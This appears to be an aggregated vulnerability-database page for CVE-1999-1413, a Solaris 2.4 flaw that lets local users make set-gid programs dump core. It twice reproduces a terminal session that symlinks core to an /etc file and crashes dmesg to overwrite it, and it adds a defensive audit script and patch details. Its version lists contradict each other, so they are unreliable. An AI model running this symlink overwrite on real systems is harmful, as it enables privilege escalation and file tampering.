CVE-1999-1413
CVSS4.6
Published: 1996-08-03 00:00:00
Revised: 2016-10-17 22:04:15
NMCOES    

[Original] Solaris 2.4 before kernel jumbo patch -35 allows set-gid programs to dump core even if the real user id is not in the set-gid group, which allows local users to overwrite or create files at higher privileges by causing a core dump, e.g. through dmesg.


[CNNVD] Solaris Coredump Vulnerability (CNNVD-199608-002)

Solaris 2.4 before kernel jumbo patch -35 contains a vulnerability that lets users who are not in the set-gid group make set-gid programs dump core. Local users can exploit it to overwrite or create files at higher privileges by causing a core dump (e.g. through dmesg).

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to modification of system files]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.4::x86

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1413
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1413
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199608-002
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=87602167419549&w=2
(UNKNOWN)  BUGTRAQ  19960803 Exploiting Zolaris 2.4 ?? :)
http://www.securityfocus.com/bid/296
(VENDOR_ADVISORY)  BID  296

- Vulnerability information

Solaris Coredump Vulnerability
Medium Other
1996-08-03 00:00:00 2005-10-20 00:00:00
Local
Solaris 2.4 before kernel jumbo patch -35 contains a vulnerability that lets users who are not in the set-gid group make set-gid programs dump core. Local users can exploit it to overwrite or create files at higher privileges by causing a core dump (e.g. through dmesg).

- Advisories and patches

On Solaris 2.4 systems with kernel jumbo patch -35 or later set-gid programs will not core dump, unless you're in the group the program is set-gid to. Later revisions of Solaris (2.5 and up) are not thought to be vulnerable to this problem.
Patches are available to all Sun customers at http://sunsolve.sun.com

Sun Solaris 2.4 _x86
  • Sun 101946-35 x86

Sun Solaris 2.4
  • Sun 101945-35 sparc
- Vulnerability information (19236)

Solaris <= 7.0 Coredump Vulnerability (EDBID:19236)
solaris remote
1996-08-03 Verified
0 Jungseok Roh
N/A
source: http://www.securityfocus.com/bid/296/info

There is a vulnerability in the way Solaris 2.4 pre Jumbo Kernel Patch -35 (for SPARC) dumps core files. Under normal operation the operating system writes out a core image of a process when it is terminated due to the receipt of some signals. The core image is called core and is written in the process's working directory (provided it can be; normal access controls apply). A process with an effective user ID different from the real user ID will not produce a core image.

The problem in this instance is that because certain directories under Solaris 2.4 are 'group bin' writable you can force programs which are in the bin group to dump core. Then by using a symlink attack you can overwrite files in directories owned by bin. A series of system critical directories under Solaris 2.4 are writable by group bin.

What follows is an example attack, slightly modified from the original Bugtraq posting.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
8 drwxrwxr-x 25 root sys 3584 7 월 25 일 18:46 /etc/
[cosmos:beren] ls -ald /usr
2 drwxrwxr-x 30 root sys 1024 7 월 5 일 17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 월 18 일 03:38 /usr/sbin/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 월 18 일 03:38 /usr/sbin/

*NOTE* These directories are group bin writable.

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) ls

*NOTE* Here we look for programs which are in group bin so we can force them to dump core.

[cosmos:beren] ls -al /usr/sbin/dmesg
12 -r-xr-sr-x 1 bin sys 5520 1994 Jul 15 /usr/sbin/dmesg*

*NOTE* Here we identify dmesg(8) as being in the 'bin' group.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command kill it . using stty ^\^ there comes the following results */
^C (Core dumped)
[comos:beren] ls /etc/SOMETHING
SOMETHING


*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd. 

- Vulnerability information

8672
Solaris Unprivileged User Core Dump Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

1996-08-03 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Solaris Coredump Vulnerability
Access Validation Error 296
No Yes
1996-08-03 12:00:00 2009-07-11 12:16:00
This vulnerability was posted to the Bugtraq mailing list by Jungseok Roh <beren@cosmos.kaist.ac.kr> Sat, 3 Aug 1996.

- Affected program versions

Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5

- Unaffected program versions

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5

- Vulnerability discussion

There is a vulnerability in the way Solaris 2.4 pre Jumbo Kernel Patch -35 (for SPARC) dumps core files. Under normal operation the operating system writes out a core image of a process when it is terminated due to the receipt of some signals. The core image is called core and is written in the process's working directory (provided it can be; normal access controls apply). A process with an effective user ID different from the real user ID will not produce a core image.

The problem in this instance is that because certain directories under Solaris 2.4 are 'group bin' writable you can force programs which are in the bin group to dump core. Then by using a symlink attack you can overwrite files in directories owned by bin. A series of system critical directories under Solaris 2.4 are writable by group bin.
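The description above (and its earlier copy in the EDB record) rests on two preconditions coinciding: directories writable by a group, and set-gid programs running under that same group whose core file can be steered into them. The following POSIX shell helper is an added audit check written for this page, not part of the advisory or the Bugtraq posting; the function names, the scanned root and the group name are assumptions supplied by the administrator.

```shell
#!/bin/sh
# Added audit helper, not from the advisory or the original posting.
# Assumptions: POSIX sh and find; $1 is the tree to scan, $2 a group name.

# Directories under $1 owned by group $2 and writable by that group: the
# places a core file produced by a set-gid $2 program could be made to land.
group_writable_dirs() {
  find "$1" -type d -group "$2" -perm -g+w 2>/dev/null
}

# Set-gid executables under $1 whose group is $2: the programs whose core
# dump would be written with group $2 privilege if core dumps are allowed.
sgid_files_in_group() {
  find "$1" -type f -group "$2" -perm -2000 2>/dev/null
}

# Returns 0 (risk present) when at least one of each exists, the pairing
# the CVE relies on; returns 1 otherwise. Prints the findings so the
# administrator knows which permissions to tighten or which programs to
# exclude from core dumping.
core_dump_risk() {
  dirs=$(group_writable_dirs "$1" "$2")
  progs=$(sgid_files_in_group "$1" "$2")
  [ -n "$dirs" ] && [ -n "$progs" ] || return 1
  printf 'group-writable dirs (group %s):\n%s\n' "$2" "$dirs"
  printf 'set-gid programs (group %s):\n%s\n' "$2" "$progs"
  return 0
}

# Usage on a live host, with the group named in the advisory:
# core_dump_risk /usr bin && echo "RISK: set-gid bin programs and bin-writable dirs"
```

Pair the check with the vendor patch level: on Solaris 2.4 the fix is kernel jumbo patch -35, after which set-gid programs no longer dump core for users outside the group.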

- Exploit

What follows is an example attack, slightly modified from the original Bugtraq posting.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
8 drwxrwxr-x 25 root sys 3584 7 월 25 일 18:46 /etc/
[cosmos:beren] ls -ald /usr
2 drwxrwxr-x 30 root sys 1024 7 월 5 일 17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 월 18 일 03:38 /usr/sbin/
[cosmos:beren] ls -ald /usr/sbin
10 drwxrwxr-x 4 root bin 4608 5 월 18 일 03:38 /usr/sbin/

*NOTE* These directories are group bin writable.

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) ls

*NOTE* Here we look for programs which are in group bin so we can force them to dump core.

[cosmos:beren] ls -al /usr/sbin/dmesg
12 -r-xr-sr-x 1 bin sys 5520 1994 Jul 15 /usr/sbin/dmesg*

*NOTE* Here we identify dmesg(8) as being in the 'bin' group.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command kill it . using stty ^\^ there comes the following results */
^C (Core dumped)
[comos:beren] ls /etc/SOMETHING
SOMETHING


*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd.

- Solution

On Solaris 2.4 systems with kernel jumbo patch -35 or later set-gid programs will not core dump, unless you're in the group the program is set-gid to. Later revisions of Solaris (2.5 and up) are not thought to be vulnerable to this problem.

Patches are available to all Sun customers at http://sunsolve.sun.com


Sun Solaris 2.4_x86

Sun Solaris 2.4

- References